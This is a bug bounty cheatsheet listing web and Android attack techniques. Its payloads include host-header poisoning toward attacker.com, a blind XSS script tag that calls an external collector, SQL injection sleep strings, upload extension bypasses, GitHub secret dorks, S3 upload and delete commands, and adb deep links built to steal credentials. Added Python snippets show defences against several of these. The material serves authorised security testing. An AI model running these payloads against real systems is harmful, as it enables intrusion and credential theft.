Cheatsheets

Bug bounty main checklist:

Given the nature of existing bug bounty programs, I created the checklist below to critically review any target for the first time. This is not a pentest checklist; rather, it is a critical assessment to find vulnerabilities in programs that have already been tested many times. [constantly adding new things here]

Critical Checklist

  • Analyse the app by placing XSS payloads in every input it reflects
  • ATO via CSRF attack (changing email)
  • ATO oauth third party apps
  • CSRF in sensitive functions
  • Critical IDORs
  • Upload features for malicious files
  • Horizontal Privilege escalation in company settings
  • Vertical Privilege escalation in company settings
  • Account deletion endpoints
  • 2FA bypass (direct, rate limit, response manipulation, etc)
  • No rate limiting in authentication/sensitive endpoints
  • Rate Limiting Bypasses (after getting 429 response)
  • Check origin IP address (DNS history records)
  • Race condition in functions that allow limited use only
  • Account data deletion
  • HTML injection in custom email functions
  • Dangerous HTTP methods enabled
    X-HTTP-Method-Override: PUT
  • Signup feature
  • Burp plugin ‘ParamMiner’ to guess parameters/headers
  • Check JWT tokens authentication/authorization
  • Check Account creation steps
  • Test weak password policy (low issue + bruteforce = takeover)
  • Captchas bypass
  • Subdomains takeover with impact
  • S3 bucket takeovers
  • Blind XSS in: contact us, ticket support, feedback, chat app
  • Ticket Trick vulnerability
  • Fuzzing for misconfiguration and sensitive files
  • CORS in sensitive endpoints
  • Test XXE if the server accepts svg files
  • Use WaybackUrls for URLS

Session & Password Attacks

Host Header Poisoning:

X-Host: attacker.com
X-Server: attacker.com
X-Forwarded-For: attacker.com
X-Forwarded-Host: attacker.com
  • Parameter Pollution – “/email=danielv@gmail.com&email=attacker@gmail.com”
  • Test “remember-me” function
  • Session Fixation
  • Cookie bomb (find any GET request that set cookies “endpoint/?dummy_cookie=reflect_this”)
  • Password reset token not expiring
  • Long Password/Email DoS attack
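The override headers listed above matter most where the application builds absolute URLs, for example the link in a password-reset e-mail. The following is an added example (not from this cheatsheet) that contrasts the vulnerable pattern with the mitigation; `ALLOWED_HOSTS` and `CANONICAL_HOST` are constructed values.

```python
from urllib.parse import quote

# Constructed for this example: hosts the application is legitimately served on.
ALLOWED_HOSTS = {"app.example.com", "www.example.com"}
CANONICAL_HOST = "app.example.com"

# Override headers from the list above; a client can send these directly, so they
# must only be honoured when a reverse proxy in front strips and re-sets them.
OVERRIDE_HEADERS = ("x-forwarded-host", "x-host", "x-server")


def request_host(headers: dict, trust_overrides: bool) -> str:
    """Pick the host the way a framework would: override headers first, if trusted."""
    lowered = {k.lower(): v for k, v in headers.items()}
    if trust_overrides:
        for name in OVERRIDE_HEADERS:
            if name in lowered:
                return lowered[name]
    return lowered.get("host", "")


def reset_link_weak(headers: dict, token: str) -> str:
    """Vulnerable pattern: the link is built from attacker-controlled host headers,
    so the victim's reset token is delivered to that host when the link is clicked."""
    host = request_host(headers, trust_overrides=True)
    return f"https://{host}/reset?token={quote(token)}"


def reset_link_hardened(headers: dict, token: str) -> str:
    """Mitigation: ignore override headers, validate Host against an allowlist and
    build the link from the configured canonical host, never from the request."""
    host = request_host(headers, trust_overrides=False).rsplit(":", 1)[0].lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted Host header: {host!r}")
    return f"https://{CANONICAL_HOST}/reset?token={quote(token)}"
```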

CSRF Bypasses

  • remove CSRF token from request
  • Remove CSRF token parameter value
  • Change POST to GET and also remove token from get “endpoint/?csrftoken=&dummy=danielvcookies”
  • Use CSRF from another account

JSON CSRF bypass

Change content-type: application/json
to
Content-Type: text/plain or Content-Type: application/x-www-form-urlencoded
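Why the Content-Type swap works, and what a server should check, as an added example (not code from this cheatsheet): a cross-site HTML form can only send `text/plain`, `multipart/form-data` or `application/x-www-form-urlencoded`, so an endpoint that parses JSON regardless of Content-Type is reachable without a CORS preflight. A CSRF token remains the primary control; the checks below are the second layer. The header names and origins are constructed.

```python
import json


def media_type(content_type: str) -> str:
    """Bare media type, lower-cased, with parameters such as charset removed."""
    return content_type.split(";", 1)[0].strip().lower()


def weak_handler(headers: dict, body: str) -> dict:
    """Vulnerable pattern: the body is parsed as JSON whatever the Content-Type says.
    A cross-site <form enctype="text/plain"> can produce a body such as
    '{"email":"attacker@example.com","pad":"=x"}' without any preflight."""
    return json.loads(body)


def accept_json_request(headers: dict, body: str, allowed_origins: set) -> tuple:
    """Mitigation: only parse when the request could not have come from a plain form.
    Returns (accepted, reason) so the caller can log rejections."""
    lowered = {k.lower(): v for k, v in headers.items()}
    ctype = media_type(lowered.get("content-type", ""))
    # Browsers refuse to send application/json cross-site without a CORS preflight,
    # so anything else (text/plain, urlencoded, multipart) is treated as a form post.
    if ctype != "application/json":
        return False, f"content-type {ctype!r} is not application/json"
    # Second layer: browsers attach Origin on cross-site POSTs; require it to be ours.
    origin = lowered.get("origin")
    if origin is not None and origin not in allowed_origins:
        return False, f"origin {origin!r} not allowed"
    try:
        json.loads(body)
    except json.JSONDecodeError as exc:
        return False, f"malformed json: {exc.msg}"
    return True, "ok"
```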

File Upload Attacks

  • upload unexpected file format to achieve RCE (swf, html, php, php3, aspx)
  • Use Burp suite Plugin “Upload Scanner” to check different kinds of file upload
  • Blind SQL injection in the file name: “pocfilename’+(select*from(select(sleep(20)))a)+’.jpeg”
  • Upload “filename.jpg” – and if the name reflects, try XSS
  • Always try XXE in .docx, .pdf and .xml uploaded files

Always check the upload response for these file extensions:

  • .SVG
  • .HTML
  • .SWF
  • .XML

PHP Extensions:

.php
.php3
.php4
.php5
.php7
.pht
.phar
.phpt
.pgif
.phtml
.phtm

Double extensions

.jpeg.php
.jpg.php
.png.php

Other extensions

asp : .asp, .aspx
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm
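The extension lists above are what a server-side filename check has to cover, including the double-extension and null-byte tricks. The following validator is an added example (not from this cheatsheet) that checks every dot-separated segment against those extensions and then applies an image allowlist; the allowed set and name length are constructed choices.

```python
import re

# Extensions the lists above name as executable or script-bearing on common
# stacks; this blocklist is only a backstop, the allowlist below is the real control.
EXECUTABLE_EXTS = {
    "php", "php3", "php4", "php5", "php7", "pht", "phar", "phpt", "pgif", "phtml", "phtm",
    "asp", "aspx", "pl", "pm", "cgi", "lib", "jsp", "jspx", "jsw", "jsv", "jspf",
    "cfm", "cfml", "cfc", "dbm", "svg", "html", "htm", "swf", "xml",
}
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}   # constructed: an image-only upload
BASENAME_RE = re.compile(r"[a-z0-9_-]{1,64}")


def validate_upload_name(filename: str) -> tuple:
    """Return (accepted, normalised name or reason). Every dot-separated segment is
    checked, so 'shell.jpg.php', 'shell.php.jpg' and 'shell.php<NUL>.jpg' all fail."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path component
    name = name.split("\x00", 1)[0].strip().lower()        # null-byte truncation trick
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing base name or extension"
    base, exts = parts[0], [e.strip() for e in parts[1:]]
    if any(e in EXECUTABLE_EXTS for e in exts):
        return False, f"executable extension in {name!r}"
    if exts[-1] not in ALLOWED_EXTS:
        return False, f"extension {exts[-1]!r} not in allowlist"
    if not BASENAME_RE.fullmatch(base):
        return False, "unexpected characters in base name"
    # Store under the sanitised name (better: a server-generated one) and keep
    # validating the content itself: check magic bytes and strip image metadata.
    return True, f"{base}.{exts[-1]}"
```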

Data Validation

Common Injection Points:

  • SQL injection in the User-Agent header: user-agent: ‘XOR(if(now()=sysdate(),sleep(5*5),0))OR’
  • Parameter ID
  • Currency Values
  • Item Number Values
  • Sorting Parameters (asc, desc)
  • Cookies Values
  • Custom Headers (possible integration with WAF’s, CDN’s)

Blind XSS

"><script src=https://blinddanielv.xss.ht></script>

  • User-Agent
  • Place an order and put the payload in the 2nd address line
  • contact us page
  • feedback page
  • chat app
  • request something (delete acct, unblock beta feature)
  • Signup page (free trial page)

Open Redirections

Common Places:

open redir + xss: redirectUrl=https://www.google.com/”;alert(0);//

Insecure Direct Object Reference (IDOR)

Common Functions:

  • Non-public Images
  • Receipts
  • Private Files (pdfs, ++)
  • Shipping Info & Purchase Orders
  • Sending/Deleting messages

Common Params:

id=
user=
account=
number=
order=
no=
doc=
key=
email=
group=
profile=
edit=

Tip: also test IDOR parameters for SQL injection

Github OSINT

Clone all the COMPANY or USER repositories (use clone_url: GitHub no longer serves the git:// URLs returned in git_url):

curl -s "https://api.github.com/users/COMPANYorUSER/repos?per_page=100" | jq -r ".[].clone_url" | xargs -L1 git clone

then use GitLeaks tool:

gitleaks -p all-company-and-user-gits/ -o gitleak-results -v

MANUAL GIT OSINT:

Some useful Github dorks

"target" password
"target" access_token
"target" client_secret
"target" account_sid
"target" private_token
"target" secret
"target" credentials
"target" token
"target" config
"target" key
"target" pass
"target" login
"target" ftp
"target" pwd
"company.com" "dev"
"company.com" API_key
"company.com" password
"target" db_host
"target" db_name
"target" db_user
"target" db_password

Dork filter by language:
"company" language:python password

S3 Buckets

List open buckets:

aws s3 ls s3://bucket.name

Download entire bucket files:

aws s3 sync s3://bucket-name .

Upload file to bucket:

aws s3 cp malicious.txt s3://bucket-name/malicious.txt

Remove file from bucket:

aws s3 rm s3://bucket-name/malicious.txt

Mobile:

Static Checklist

  • folders /assets and /res /raw
  • GREP for sensitive keys using this pattern: grep -rE 'AIza[0-9A-Za-z_-]{35}' . (the {35} interval needs extended regex, hence -E)
  • search sensitive .txt files
  • Inspect Manifest.xml file
  • /res/values/strings.xml API keys
  • @xml/network_security_config.xml analysis
  • Test deep links in Manifest.xml
  • verify firebase access to /.json, /Users.json, /Logs.json
  • Check Activities/Services/Intents with adb tool
  • Grep sensitive Keywords in decompiled jar files and apk’s folder
  • Sensitive information disclosed in application error messages
  • Binary reverse engineering
  • Collect URLs and Endpoints from apk
  • Sensitive information disclosed in storage of the mobile device
  • Sensitive information found in logs
  • Sensitive information found in cache
  • Sensitive information found in installed application folder
  • Sensitive information stored in shared preference files
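The GitHub dorks and the grep pattern above both look for the same thing: credential-like strings in files. The scanner below is an added example (not the cheatsheet's tooling) that runs the Google API key regex plus a keyword=value rule built from the keyword list over constructed sample lines, and redacts what it finds so the report does not itself leak the secret.

```python
import re

# Rules constructed for this example: the Google API key pattern from the grep
# above and a keyword=value rule built from the credential keywords in this section.
RULES = {
    "google-api-key": re.compile(r"AIza[0-9A-Za-z_-]{35}"),
    "keyword-assignment": re.compile(
        r"(?i)\b(secret|password|passwd|pwd|token|api_?key|client_secret|db_password)\b"
        r"\s*[:=]\s*[\"']?([^\s\"'<>]{8,})"
    ),
}


def redact(value: str) -> str:
    """Keep a short prefix/suffix so the report itself does not leak the secret."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def scan(text: str, path: str = "<inline>") -> list:
    """Run every rule over each line; findings carry location and a redacted preview."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, rx in RULES.items():
            for m in rx.finditer(line):
                value = m.group(m.lastindex or 0)   # last group is the secret, else whole match
                findings.append({"path": path, "line": lineno, "rule": rule,
                                 "preview": redact(value)})
    return findings


# Constructed sample: a decompiled strings.xml line, a config line and two benign lines.
SAMPLE = """\
<string name="maps_key">AIzaSyA1234567890abcdefghijklmnopqrstuv</string>
db_password = "S3cr3tPassw0rd!"
# token rotated on 2024-01-01, see vault
API_KEY=
"""

if __name__ == "__main__":
    for f in scan(SAMPLE, "res/values/strings.xml"):
        print(f"{f['path']}:{f['line']} {f['rule']} {f['preview']}")
```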

Dynamic Checklist

  • Client/Server Side attacks
    • Check for SQL injection
    • XML injection
    • XSS injection
  • App level DOS (long inputs, json dos)
  • Broken Authentication & Authorization
    • Session behavior after password reset
    • Expired Token can be reused
    • Oauth Flow
    • 2FA bypass
    • Cleartext Transmission
    • Auth bypass using response manipulation
  • Broken Access Control
    • SSRFs
    • Privilege escalations
    • IDORs
    • Unauthorized/Sensitive API calls
  • CAPTCHA implementation flaws & bypass
  • Check all HTTP methods (PUT, DELETE, etc.; use Burp Intruder for HTTP verb tampering)
  • Other user’s sensitive details enumeration
  • Malicious file upload
  • Server side flaws (IIS, APACHE, TOMCAT etc.)

Keywords:

secret
password
user
token
api
key
internal
staging
ftp
ssh
http
.plist
.json
.conf

Android components

ADB command to trigger Schemes:

adb shell am start -W -a android.intent.action.VIEW -d "custom://intent"

Open redirection + steal credentials

adb shell am start -a android.intent.action.VIEW -d "custom://deeplink?parameter=https://attacker.com.br" --ez authentication_header true

Adb to trigger components:

Activity:

adb shell am start -n "com.peirr.test/com.peirr.test.MyActivity" --es name "John" --ei age 30

Broadcast Receiver:

adb shell am broadcast -n "com.peirr.test/com.peirr.test.MyReceiver" --es name "John" --ei age 30

Services:

adb shell am startservice -n "com.peirr.test/com.peirr.test.MyService" --es name "John" --ei age 30

XSS with available parameters:

adb shell am start -n com.company.apk/com.company.mseg.activity.CommonActivity -e url "javascript:alert(1)"

Schemas allowed in Activity:

To reproduce local file access use:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "file:///storage/emulated/0/Download/document-blank.pdf"

To reproduce javascript injection:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "javascript://example.com%0A alert(1);"

To reproduce open redirect:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "http://attacker.com.br"
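The components the adb commands above can reach are exactly those the manifest exports. As an added example (not from this cheatsheet), the function below reads an AndroidManifest.xml and lists exported activities, services and receivers with the actions and URI schemes their intent-filters accept, which is the surface to audit for file://, javascript: and http(s) handling; the manifest and package name are constructed.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def attr(name: str) -> str:
    """Qualified attribute key for android:<name> as ElementTree stores it."""
    return f"{{{ANDROID_NS}}}{name}"


def exported_components(manifest_xml: str) -> list:
    """Return the activities, services and receivers other apps can reach, with the
    actions and URI schemes their intent-filters accept (what 'am start' above hits)."""
    root = ET.fromstring(manifest_xml)
    found = []
    for comp in root.find("application"):
        if comp.tag not in ("activity", "service", "receiver"):
            continue
        filters = comp.findall("intent-filter")
        explicit = comp.get(attr("exported"))
        # Android rule: an explicit android:exported wins; otherwise a component with
        # any intent-filter is implicitly exported (API 31+ requires it to be explicit).
        exported = explicit == "true" if explicit is not None else bool(filters)
        if not exported:
            continue
        found.append({
            "type": comp.tag,
            "name": comp.get(attr("name")),
            "actions": sorted({a.get(attr("name")) for f in filters
                               for a in f.findall("action") if a.get(attr("name"))}),
            "schemes": sorted({d.get(attr("scheme")) for f in filters
                               for d in f.findall("data") if d.get(attr("scheme"))}),
            "permission": comp.get(attr("permission")),   # None: any app may call it
        })
    return found


# Constructed manifest: one deep-link activity that also accepts file:// URIs,
# one private activity, one permission-guarded receiver and one private service.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <application>
    <activity android:name=".CommonActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="custom" android:host="deeplink"/>
        <data android:scheme="file"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalActivity" android:exported="false"/>
    <receiver android:name=".MyReceiver" android:exported="true" android:permission="com.example.SEND"/>
    <service android:name=".MyService"/>
  </application>
</manifest>
"""
```

An exported component with no `permission` and a `file` or `http` scheme is the first thing to review against the local-file and redirect cases above.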